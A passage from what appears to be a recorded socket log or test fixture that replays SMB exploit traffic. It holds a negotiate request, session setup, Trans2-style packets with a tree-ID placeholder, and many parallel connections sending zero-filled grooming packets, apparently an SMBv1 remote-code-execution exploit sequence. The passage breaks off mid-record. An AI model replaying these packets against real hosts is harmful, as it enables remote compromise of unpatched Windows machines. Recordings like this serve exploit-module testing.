0\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, 
b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, 
b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 